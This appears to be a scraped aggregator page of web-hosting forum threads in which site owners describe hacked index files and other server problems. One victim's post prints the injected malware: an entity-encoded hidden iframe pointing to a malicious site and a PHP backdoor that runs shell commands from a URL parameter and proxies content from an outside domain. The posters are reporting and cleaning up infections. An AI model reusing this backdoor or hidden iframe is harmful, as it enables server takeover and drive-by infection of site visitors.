Unwanted Code In Index.html

Dec 4, 2008

I have multiple demo websites under single domain. and in each folder default page is as index.html

few days back i have observed a blank space on each index.html. when i check the code then i have found an auto generated code just after the body tag in index.html. the code is as follows

<div style="visibility:hidden"><iframe src="[url]

Also I am getting Question marks (?) in some blank spaces in HTML preview.

I have removed it but it again appears after some time. I have contacted to server support but they said that this is SQL Injection attack but there is no database connectivity involved in any of my websites.

View 12 Replies


ADVERTISEMENT

Static Index.html Pages Hacked, Also Index Files

Sep 8, 2007

My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.

I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).

Going back on track, all files named "%index%" were hacked.

-I found a index.txt file with links to obscure sites.

The code was written at bottom of the all index.html files: iframe code

Code:
><!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#103&#111&#111&#103&#108&#101&#116&#114&#97&#102&#102&#46&#99&#111&#109&#47&#105&#110&#46&#99&#103&#105&#63&#100&#101&#102&#97&#117&#108&#116" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code

PHP Code:

<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

");$wr = 0;while(!feof($socket)){  $temp = fgets($socket);    if(eregi("<",$temp)) {      $wr = 1;        }                      if($wr) {              $page .= $temp;                }                }                fclose($socket);                                return $page;                }                                ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...

View 5 Replies View Related

Setting Index.html As Default Page Instead Of Index.php?

Jun 23, 2008

Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.

View 1 Replies View Related

Torjan In Html Index

Mar 6, 2008

in many sites in my server torjan in index.html

in <ifram>

how to save my server from that .js torjan

and i need to ask about other thing this torjan can chang any this in backups

View 9 Replies View Related

Malicious Code Added To Index File

Jul 9, 2008

I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.

I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.

View 8 Replies View Related

How To Display Domain Index.html At Ip And Nameserver

Jul 18, 2009

How do I have mydomain.com display at the main IP address as well as the nameserver IE server01.mydomain.com?

now all that is displayed there is the Apache page

View 5 Replies View Related

How To Make Index.html In Evey Folder

Mar 4, 2007

how can i make in SSH install index.html in evey folder without index in my server?

View 6 Replies View Related

Showing As Home Page Without Index.html

Jul 19, 2007

Is it possible to show a default page as the home page of the web site, without setting it as index.html or default.html? This is only on a shared hosting account , so the client does not have access to the apache conf or anything like that.

Here is the site. But, when I move the whole account over to my server, it doesn't show as the home page.

View 5 Replies View Related

Hacker Adds Malicious Code To All Html And Php Files

Apr 30, 2009

we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?

The problem:

On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.

Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.

On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.

We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.

What we have done to attempt to secure the server:
1) We have installed SuPhp.

2) We have ensured that all scripts on the affected websites are updated and running the latest versions.

3) We have changed all the passwords.

Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.

The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.

One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.

Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?

[url]

View 14 Replies View Related

Apache Has A Way To Insert Some Html Code Below <body> To Every Webpage

May 11, 2008

How to modify add some html code (such as banner, header, footer) to every webpage? without modify original files.

Under <body> or above </html> tags.

Something like search and replace.

View 5 Replies View Related

301 Redirect From Index.htm Index.asp Using Limited IIS Server

Mar 6, 2007

I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.

The problem is that their old index.htm page has a pagerank of 4 which we want to keep.

And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.

The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.

My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?

JavaScript, I have heard is completely out the question

View 3 Replies View Related

Invalid Response Code Received From Server Code: 451,

Jul 7, 2007

when I try to send Email from horde I have this:

PHP Code:

There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)] 

View 5 Replies View Related

How To Limit Html Parsing To .htm, .html Files Only

Jan 10, 2007

My webserver treat ALL files with html tags inside as html files, e.g. text files or EVEN files without extension.

How to only allow .htm, .html files?

I've deactivated temporary mime magic, I also tried with some RemoveHandler, AddType lines but nothing

View 9 Replies View Related

Clean Up Unwanted Files From /tmp And Mail Queue

May 26, 2008

How do i can perform

- Clean up unwanted files from /tmp
- Check and clean the mail queue
- Check /proc for hidden or unwanted processes


I will be thanking the person who can give in details how to perform each point in vps server and what's the steps or commands i should follow .

View 3 Replies View Related

How To Prevent People Upload Unwanted .php File

Oct 22, 2007

I have a 777 cmod folder open. It needed to be writable so that legitimate users can upload their picture. However, i do not want people to upload .php or .php.pjepg etc to the server.

There are times that they do not use the form in my site to upload the php file. How can they do that? via perl command? And how to prevent such thing from happending?

View 8 Replies View Related

Every Email Which Sends Outputs Unwanted Lines

Mar 19, 2008

Every email which gets automatically sent out from my server begins with:

Reply-To: noreply@MYDOMAIN.com

X-Mailer: PHP/4.4.7
Message-Id: <20080319210750.564111CEC004@mx.MYDOMAIN.com>
Date: Wed, 19 Mar 2008 22:07:50 +0100 (CET)

Dear DOMAIN.com Member,

This is not in our PHP code or anything, and I can't seem to remove it, its just a tad annoying. How do I remove it?

View 6 Replies View Related

Is It A Hacking Attempt.. Request Of Wierd Files Along With Unwanted SSL Handshake

Mar 30, 2009

I see following errors in my server ie. httpd error logs:

Code:
[Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 79.132.204.192) (OpenSSL library error follows)
[Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac
[Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 60.63.241.18) (OpenSSL library error follows)
[Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol [Hint: speaking not SSL to HTTPS port!?]
[Mon Mar 30 07:23:56 2009] [error] [client 114.224.169.0] File does not exist: /var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bFT/SX00/VtJVht/D1XvJBgHP/5lll.gif
[Mon Mar 30 08:46:42 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
In last you can see that MySQL reached maximum allowed client ..and it crashed

Also, at regular intervals I see such requests:
/var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bF/SX00/VtJVht/D1XvJBgHP/5lll.gif

Also I see SSL handshake failure notices while I do not have any SSL cert or SSL running site on this server.

View 4 Replies View Related

Index.php Is Not Working But Index.php? Is Ok

Mar 27, 2007

I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.

when I add "?" to the end of the URL[url]" it runs with no problems!

Is it something wrong with httpd.conf or what?

View 6 Replies View Related

No Index With Prefix Www

Mar 9, 2007

I have a client who's index will not come up when using "www". Of course I have checked the dns severs and all is well.

View 4 Replies View Related

Subdomain Index Page

Aug 28, 2009

I created the subdomain for my site www.mysite/myclientpotentialdomain, with the only purpose to show my client the mock up of his home page using his potential domain name.
The file is named index.htm and consist only the mock up image.

The problem that I encountered is when I refresh the browser (Firefox) the image disappears. I can see the alt tag, but the picture is gone. Works fine in IE though.
The only difference I have noticed that after the refreshment,

View 13 Replies View Related

CPanel / Apache 'Index Of /'

Sep 30, 2009

how to display the time and date of a file that was added to an Apache file directory on a cPanel server?

It used display the time and date back in the 1.3 and 2.0 days, but it doesn't on the 2.2 versions of Apache.

View 2 Replies View Related

Index Page Not Showing

Jul 23, 2009

i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website www.example.com but its opening when i try with www.example.com/index.html.

View 4 Replies View Related

Can't Change The Index Page

Jan 14, 2008

I'm working with HELM panel

I have deleted the index.htm file and uploaded another one

the first one had some images <img>, now

1. when i request the main page [url] the old index file is still appearing!

2. the images that was in the <img> tags of the old index file can't be deleted or renamed : can't be accessed at all.

View 3 Replies View Related

All Index Files Got Infected

Jun 12, 2007

after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files

Code:
<iframe src=[url]

and when i delete this code it come again in all index files

i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again

View 14 Replies View Related

Index Page Hacking

Dec 4, 2007

One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at
[url]

View 3 Replies View Related

Dedicated Hacked With All Index Files

Sep 10, 2006

I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....

View 3 Replies View Related

PATHINFO, How To Get Rid Of Index.php In Wordpress Permalinks

Jul 25, 2009

I don't know what's wrong with the server where the wordpress site is hosted. But in the permalinks, index.php must be included in the permalinks (more information here:[url]

What can be fixed in the server so that wordpress permalinks will work correctly?

View 2 Replies View Related

Index Page Viewable On Server IP

Jan 15, 2008

I am using WHMCS and need to upload an index.php per server I wish to monitor. How do I go about doing this so that I can view the page via this method

[url]

I'm using cpanel / centos

View 6 Replies View Related

How To Change Index Manager Defaults?

Nov 8, 2008

How to change index manager defaults?

Whenever I set up a new account

View 4 Replies View Related

Index.php Not Working After Hack Attempt

Jun 24, 2008

I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.

We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".

We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.

Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )

View 7 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved